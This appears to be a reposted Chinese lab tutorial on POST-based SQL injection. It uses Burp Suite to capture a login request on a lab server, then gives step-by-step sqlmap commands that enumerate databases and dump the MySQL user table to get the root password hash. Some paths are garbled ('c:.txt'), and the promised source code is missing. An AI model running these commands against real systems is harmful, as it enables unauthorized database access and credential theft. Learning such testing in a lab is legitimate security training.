sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。
POST注入形成的原因POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下:
通过该实验熟悉sqlmap常用的命令,完成POST注入攻击。
实验环境
服务器:CentOS,IP地址:10.1.1.136
测试者:win7,IP地址随机
1.打开http://10.1.1.136,输入用户名:admin,密码:password,登录:
2.选择Brute Force选项,username和password随便输入(此处我输入admin和123456),然后打开burpsuite,设置好本地代理(忘记的同学可看实验一),进行抓包:
3.将抓到的包保存为1.txt,并放到c盘根目录下。
列数据库,输入命令:
sqlmap.py -r c:.txt -p username --dbs
注:-r表示加载一个文件,-p指定参数。
4.选择一个数据库,比如选mysql,猜表,输入命令:
sqlmap.py -r c:.txt-p username -D mysql --tables
5.猜列,输入命令:
sqlmap.py -r c:.txt-p username -D mysql -T user --columns
6.猜数据,输入命令:
sqlmap.py -r c:.txt -p username -D mysql -T user -C “User,Password” --dump
7.此时就得到了root用户的密码哈希值,接下来解密就行。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)